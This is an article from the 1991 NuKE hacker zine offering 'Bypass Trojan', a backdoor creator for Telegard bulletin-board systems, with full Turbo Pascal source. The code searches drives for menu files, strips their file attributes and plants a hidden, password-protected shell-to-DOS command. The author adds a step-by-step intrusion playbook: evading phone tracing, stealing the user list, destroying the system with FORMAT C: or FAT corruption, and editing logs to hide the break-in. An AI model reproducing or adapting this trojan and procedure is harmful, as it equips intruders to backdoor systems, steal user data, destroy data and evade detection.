Copy Link
Add to Bookmark
Report
NuKE Issue 01-021
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Bypass Trojan v1.0 and v2.0 :
Created by: Mechanix
Released : October 1991
Introduction:
Well this is basically another backdoor creator for Telegard Systems. This
one is relatively fullproof except for the fact that it requires REMOTE.BAT to
exist on the target system, or it will not function properly. However, the
Bypass Trojan v2.0 takes care of this problem as it creates REMOTE.BAT on the
target system, if it doesn't exist already. This is why I am also releasing
the source (in Turbo Pascal) to the Bypass Trojan v1.0. You will find the
source after the description.
Description:
This trojan will scan all directories on drives C: to E: in search of the
MAIN.MNU file. Then it will append a few lines to the file as to create a
hidden command to shell to DOS. It also checks to see if the MAIN.MNU file is
Read-Only or Hidden, and will remove these attributes long enough to make the
changes. It will also check for write-protection. The source can also be
changed as to modify any of the .MNU files.
Notes:
This trojan uses a basic Turbo Pascal cycle to scan all directories and
files, and thus the source can be modified for a number of uses. As for a good
procedure to nail the board once the shell to DOS command has been
implemented, I recommend the following:
- First and foremost, use a PBX or other phreaking trick to avoid the
annoying Maestro phone.
- Call preferably around 4-5 am, when the SysOp is almost sure not to be
around.
- Use the shuttle password (if there is one) and then apply as a NEW user
after you have bypassed the shuttle password. This will usually bypass CBV
utilities.
- Shell to DOS in the correct menu.
- Turn your capture mode on, as to record everything you see.
- Go get the user list and ZIP it up with another ZIP file that is already
online. This way you can D/L it later when you log on again. Or capture it
through a text file viewing utility if you find one on the system.
- If you don't want the user list, and just want to crash the board, then
FORMAT C: should do the trick. Or uses DEBUG to rearrange his FATs. Or if
it's a H/P board, use one of the online virii or trojans to screw him. That
will teach him, and you get to test them out.
- If you decide to only take the user list and let the board live, then go
edit the logs as to remove all evidence of your actions. If there's a spool
to printer log, you're in trouble.
- If you could not bypass CBV, then find that utility's log and edit out
your number.
- Lastly, take off the DOS shell command from the menu you modified in the
first place, unless you want to use it again, but this is risky.
Well that's the method I've been using, but the choice is your's.
Source:
PROGRAM BYPASS1;
{ Bypass Trojan v1.0 }
{ Created by: MîHï!X [NuKE] }
{ Created on: 27/09/91 }
USES DOS;
VAR
Target : SEARCHREC;
T : TEXT;
PROCEDURE DIRECT (PATH : STRING);
VAR
PATH2 : STRING;
INFO : SEARCHREC;
INFO2 : SEARCHREC;
F : TEXT;
BEGIN
Findfirst (PATH + '\*.*',$10,INFO);
WHILE DOSERROR = 0 DO
BEGIN
IF (INFO.ATTR = $10) AND (INFO.NAME[1] <> '.') THEN
Begin
PATH2 := PATH + '\' + INFO.NAME;
Chdir (PATH2);
Findfirst ('MAIN.MNU',($3F - $10),INFO2); { Or any .MNU you wish }
WHILE DOSERROR = 0 DO
Begin
ASSIGN (F,INFO2.NAME);
Setfattr (F,$20);
Append (F);
Writeln (F,' ');
Writeln (F,' ');
Writeln (F,'#'); { Key to add }
Writeln (F,' ');
Writeln (F,'-$');
Writeln (F,'NUKEWAR;PW: ;^8WRONG - access denied!'); { Password }
Writeln (F,' ');
Writeln (F,' ');
Writeln (F,' ');
Writeln (F,'#'); { Key to add }
Writeln (F,' ');
Writeln (F,'D-');
Writeln (F,'REMOTE.BAT');
Close (F);
Findnext(INFO2);
End;
DIRECT (PATH2);
End;
Findnext(INFO);
End;
END;
PROCEDURE FILEFIND (DRIVE : CHAR);
BEGIN
Chdir (DRIVE + ':\');
Findfirst ('MAIN.MNU',($3F - $10),Target); { Or any .MNU you wish }
WHILE DOSERROR = 0 DO
Begin
ASSIGN (T,Target.name);
Setfattr (T,$20);
{$I-}
Append (T);
{$I+}
IF IORESULT = 0 THEN
Begin
Writeln (T,' ');
Writeln (T,'#'); { Key to add }
Writeln (T,' ');
Writeln (T,'-$');
Writeln (T,'NUKEWAR;PW: ;^8WRONG - access denied!'); { Password }
Writeln (T,' ');
Writeln (T,' ');
Writeln (T,' ');
Writeln (T,'#'); { Key to add }
Writeln (T,' ');
Writeln (T,'D-');
Writeln (T,'REMOTE.BAT');
Close (T);
End
ELSE
Exit;
Findnext (Target);
End;
DIRECT (DRIVE + ':');
END;
BEGIN
{$I-}
Chdir ('C:\');
{$I+}
IF IORESULT = 0 THEN
FILEFIND ('C');
{$I-}
Chdir ('D:\');
{$I+}
IF IORESULT = 0 THEN
FILEFIND ('D');
{$I-}
Chdir ('E:\');
{$I+}
IF IORESULT = 0 THEN
FILEFIND ('E');
END.
Well there it is. Please feel free to improve it in anyway you like. I will
soon release the source to Bypass Trojan v2.0 which checks for REMOTE.BAT and
creates one if needed. The REMOTE.BAT file also has the Hidden attribute to
try and hide it from the SysOp. The reason for this, is that smart SysOps, and
any of those who are reading this, rename the REMOTE.BAT or remove it, to
avoid this sort of trojan. The original release is for a modem on Com2. If you
wish to have the trojan for another device, either edit it in the .EXE, or
contact me (Mechanix) on any [NuKE] board, and I will recompile the source for
you with another device.
Mechanix [NuKE]
